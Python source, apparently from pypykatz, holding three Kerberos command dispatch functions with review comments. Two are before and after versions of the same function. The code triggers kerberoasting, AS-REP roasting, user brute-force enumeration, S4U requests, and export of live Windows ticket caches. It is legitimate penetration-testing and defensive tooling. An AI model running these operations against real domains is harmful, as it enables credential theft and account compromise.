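def run_live(self, args):
    """Run the ``live`` kerberos sub-command selected by ``args.live_kerberos_module``.

    Live mode works against the local Windows host through ``KerberosLive``;
    on any other platform a message is printed and nothing else happens.

    Sub-commands handled: ``roast``, ``tgt``, ``apreq``, ``currentluid``,
    ``purge``, ``sessions``, ``triage`` and ``dump``. Any other value falls
    through silently.

    Args:
        args: parsed CLI namespace. Depending on the sub-command the
            attributes ``out_file``, ``target``, ``luid`` and ``outdir``
            are read.

    Returns:
        None. Results are printed or written to the requested file(s).
    """
    if platform.system() != 'Windows':
        print('[-]This command only works on Windows!')
        return

    # Function-scope imports: the live module is only importable/usable on Windows.
    import os
    from pypykatz.kerberos.kerberoslive import KerberosLive, live_roast # , purge, list_sessions #get_tgt, get_tgs

    kl = KerberosLive()

    if args.live_kerberos_module == 'roast':
        # `errors` is returned by live_roast but not reported here.
        res, errors, err = asyncio.run(live_roast(args.out_file))
        if err is not None:
            print('[LIVE][KERBEROS][ROAST] Error while roasting tickets! Reason: %s' % geterr(err))
            return
        if args.out_file is None:
            for r in res:
                print(r)

    elif args.live_kerberos_module == 'tgt':
        ticket = kl.get_tgt(args.target)
        if args.out_file is None:
            print_kirbi(ticket)
            return
        with open(args.out_file, 'wb') as f:
            f.write(ticket)

    elif args.live_kerberos_module == 'apreq':
        apreq, sessionkey = kl.get_apreq(args.target)
        print('APREQ b64: ')
        print(format_kirbi(apreq.dump()))
        # The session key goes to stdout in base64, so it also lands in any
        # terminal scrollback or captured console log.
        print('Sessionkey b64: %s' % base64.b64encode(sessionkey).decode())

    elif args.live_kerberos_module == 'currentluid':
        print(hex(kl.get_current_luid()))

    elif args.live_kerberos_module == 'purge':
        luid = None
        if args.luid is not None:
            # Accept either a 0x-prefixed hex string or a decimal string.
            # NOTE(review): the triage/dump branches use
            # KerberosCMDHelper.luid_converter for the same job; confirm the
            # two parsers agree before unifying them.
            if args.luid.startswith('0x'):
                luid = int(args.luid, 16)
            else:
                luid = int(args.luid)

        kl.purge(luid)
        print('Tickets purged!')

    elif args.live_kerberos_module == 'sessions':
        kl.list_sessions()

    elif args.live_kerberos_module == 'triage':
        if args.luid is None:
            ticketinfos = kl.get_all_ticketinfo()
        else:
            luid = KerberosCMDHelper.luid_converter(args.luid)
            ticketinfos = kl.get_ticketinfo(luid)

        table = [['LUID', 'ServerName', 'RealmName', 'StartTime', 'EndTime', 'RenewTime', 'EncryptionType', 'TicketFlags']]
        for luid in ticketinfos:
            # An empty ticket list contributes no rows, so no explicit skip is needed.
            for ticket in ticketinfos[luid]:
                table.append([
                    hex(luid),
                    ticket['ServerName'],
                    ticket['RealmName'],
                    filetime_to_dt(ticket['StartTime']).isoformat(),
                    filetime_to_dt(ticket['EndTime']).isoformat(),
                    filetime_to_dt(ticket['RenewTime']).isoformat(),
                    str(ticket['EncryptionType']),
                    str(ticket['TicketFlags'])
                ])

        print_table(table)

    elif args.live_kerberos_module == 'dump':
        if args.luid is None:
            tickets = kl.export_all_ticketdata()
        else:
            luid = KerberosCMDHelper.luid_converter(args.luid)
            tickets = kl.export_ticketdata(luid)

        if args.outdir is not None:
            for luid in tickets:
                for idx, ticket in enumerate(tickets[luid]):
                    # The previous code wrote every ticket to the same
                    # 'ticket_a.kirbi' name, so each write overwrote the last
                    # one, and it glued the name onto outdir without a path
                    # separator. Name files per LUID and position instead.
                    # The files hold the raw ticket blobs; who can read them
                    # is governed by the permissions on outdir.
                    filename = 'ticket_%s_%s.kirbi' % (hex(luid), idx)
                    with open(os.path.join(args.outdir, filename), 'wb') as f:
                        f.write(ticket['Ticket'])
        else:
            for luid in tickets:
                if len(tickets[luid]) == 0:
                    continue

                print('LUID @%s' % hex(luid))
                for ticket in tickets[luid]:
                    print_kirbi(ticket['Ticket'])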
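def run(self, args):
    """Run the platform-independent kerberos sub-command in ``args.kerberos_module``.

    Sub-commands handled: ``tgt``, ``tgs``, ``brute``, ``asreproast``,
    ``spnroast``, ``s4u``, ``keytab``, ``ccache`` (further selected by
    ``args.ccache_module``) and ``kirbi`` (further selected by
    ``args.kirbi_module``). Unknown values fall through silently.

    Args:
        args: parsed CLI namespace; which attributes are read depends on
            the selected sub-command.

    Returns:
        None. Results are printed or written to ``args.out_file``.
    """
    if args.kerberos_module == 'tgt':
        kirbi, filename, err = asyncio.run(get_TGT(args.url))
        if err is not None:
            print('[KERBEROS][TGT] Failed to fetch TGT! Reason: %s' % err)
            return

        if args.out_file is not None:
            with open(args.out_file, 'wb') as f:
                f.write(kirbi.dump())
        else:
            print_kirbi(kirbi)

    elif args.kerberos_module == 'tgs':
        tgs, encTGSRepPart, key, err = asyncio.run(get_TGS(args.url, args.spn))
        if err is not None:
            print('[KERBEROS][TGS] Failed to fetch TGS! Reason: %s' % err)
            return

        if args.out_file is not None:
            # This branch used to be a bare `pass`: the ticket was fetched and
            # then dropped without any indication. get_TGS returns no
            # kirbi-shaped object here, so say so rather than fail silently.
            print('[KERBEROS][TGS] Writing the TGS to a file is not implemented, nothing was saved!')
        else:
            print(tgs)
            print(encTGSRepPart)
            print(key)

    elif args.kerberos_module == 'brute':
        target_spns = generate_targets(args.targets, args.domain)
        _, err = asyncio.run(brute(args.address, target_spns, args.out_file, args.show_negatives))
        if err is not None:
            print('[KERBEROS][BRUTE] Error while enumerating users! Reason: %s' % geterr(err))
            return

    elif args.kerberos_module == 'asreproast':
        target_spns = generate_targets(args.targets, args.domain, to_spn = False)
        _, err = asyncio.run(asreproast(args.address, target_spns, out_file = args.out_file, etype = args.etype))
        if err is not None:
            print('[KERBEROS][ASREPROAST] Error while enumerating users! Reason: %s' % geterr(err))
            return

    elif args.kerberos_module == 'spnroast':
        target_spns = generate_targets(args.targets, args.domain, to_spn = True)
        _, err = asyncio.run(spnroast(args.url, target_spns, out_file = args.out_file, etype = args.etype))
        if err is not None:
            print('[KERBEROS][SPNROAST] Error while enumerating users! Reason: %s' % geterr(err))
            return

    elif args.kerberos_module == 's4u':
        # NOTE(review): out_file is hard-wired to None and the returned
        # tgs/encTGSRepPart/key are never printed or saved, so on success
        # this branch produces no output at all.
        tgs, encTGSRepPart, key, err = asyncio.run(s4u(args.url, args.spn, args.targetuser, out_file = None))
        if err is not None:
            # The message was copy-pasted from the enumeration branches; no
            # user enumeration happens here.
            print('[KERBEROS][S4U] Error! Reason: %s' % geterr(err))
            return

    elif args.kerberos_module == 'keytab':
        process_keytab(args.keytabfile)

    elif args.kerberos_module == 'ccache':
        if args.ccache_module == 'list':
            list_ccache(args.ccachefile)
        elif args.ccache_module == 'roast':
            roast_ccache(args.ccachefile, args.out_file)
        elif args.ccache_module == 'del':
            del_ccache(args.ccachefile, args.index)
        elif args.ccache_module == 'exportkirbi':
            ccache_to_kirbi(args.ccachefile, args.kirbidir)
        elif args.ccache_module == 'loadkirbi':
            kirbi_to_ccache(args.ccachefile, args.kirbi)

    elif args.kerberos_module == 'kirbi':
        if args.kirbi_module == 'parse':
            parse_kirbi(args.kirbifile)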
def run(self, args):
    """Dispatch the platform-independent kerberos sub-command chosen on the CLI.

    ``args.kerberos_module`` selects one of ``tgt``, ``tgs``, ``brute``,
    ``asreproast``, ``spnroast``, ``s4u``, ``keytab``, ``ccache`` or
    ``kirbi``; the last two are refined by ``args.ccache_module`` and
    ``args.kirbi_module``. An unrecognised value does nothing.

    Args:
        args: parsed CLI namespace; only the attributes relevant to the
            selected sub-command are read.

    Returns:
        None. Output is printed or written to ``args.out_file``.

    Raises:
        Exception: for ``spnroast`` when neither ``args.ldap`` nor
            ``args.targets`` is given.
    """
    def emit_kirbi(result):
        # Shared tail of tgt / tgs / s4u: save to out_file when one was
        # given, otherwise print the kirbi.
        if args.out_file is None:
            print_kirbi(result)
            return
        with open(args.out_file, 'wb') as outfile:
            outfile.write(result.dump())

    module = args.kerberos_module

    if module == 'tgt':
        kirbi, err = asyncio.run(get_TGT(args.url, override_etype = args.etype))
        if err is not None:
            print('[KERBEROS][TGT] Failed to fetch TGT! Reason: %s' % err)
            return
        emit_kirbi(kirbi)
        return

    if module == 'tgs':
        tgs, encTGSRepPart, key, kirbi, err = asyncio.run(get_TGS(args.url, args.spn, override_etype = args.etype))
        if err is not None:
            print('[KERBEROS][TGS] Failed to fetch TGS! Reason: %s' % err)
            return
        emit_kirbi(kirbi)
        return

    if module == 'brute':
        target_spns = generate_targets(args.targets, args.domain)
        _, err = asyncio.run(brute(args.address, target_spns, args.out_file, args.show_negatives))
        if err is not None:
            print('[KERBEROS][BRUTE] Error while enumerating users! Reason: %s' % geterr(err))
        return

    if module == 'asreproast':
        # Targets come from LDAP when an LDAP URL is supplied, otherwise
        # from the explicit target list.
        if args.ldap is not None:
            target_spns, _ = asyncio.run(get_ldap_kerberos_targets(args.ldap, target_type = 'asrep'))
        else:
            target_spns = generate_targets(args.targets, args.domain, to_spn = False)
        _, err = asyncio.run(asreproast(args.address, target_spns, out_file = args.out_file, etype = args.etype))
        if err is not None:
            print('[KERBEROS][ASREPROAST] Error! Reason: %s' % geterr(err))
        return

    if module == 'spnroast':
        if args.ldap is not None:
            _, target_spns = asyncio.run(get_ldap_kerberos_targets(args.ldap, target_type = 'spn'))
        elif args.targets is not None:
            target_spns = generate_targets(args.targets, args.domain, to_spn = True)
        else:
            raise Exception('Either LDAP URL or targets must be provided')
        _, err = asyncio.run(spnroast(args.url, target_spns, out_file = args.out_file, etype = args.etype))
        if err is not None:
            print('[KERBEROS][SPNROAST] Error! Reason: %s' % geterr(err))
        return

    if module == 's4u':
        tgs, encTGSRepPart, key, kirbi, err = asyncio.run(s4u(args.url, args.spn, args.targetuser))
        if err is not None:
            print('[KERBEROS][S4U] Error! Reason: %s' % geterr(err))
            return
        emit_kirbi(kirbi)
        return

    if module == 'keytab':
        process_keytab(args.keytabfile)
        return

    if module == 'ccache':
        # Lambdas keep attribute access lazy: only the selected action
        # reads its arguments from args.
        ccache_actions = {
            'list': lambda: list_ccache(args.ccachefile),
            'roast': lambda: roast_ccache(args.ccachefile, args.out_file),
            'del': lambda: del_ccache(args.ccachefile, args.index),
            'exportkirbi': lambda: ccache_to_kirbi(args.ccachefile, args.kirbidir),
            'loadkirbi': lambda: kirbi_to_ccache(args.ccachefile, args.kirbi),
        }
        action = ccache_actions.get(args.ccache_module)
        if action is not None:
            action()
        return

    if module == 'kirbi' and args.kirbi_module == 'parse':
        parse_kirbi(args.kirbifile)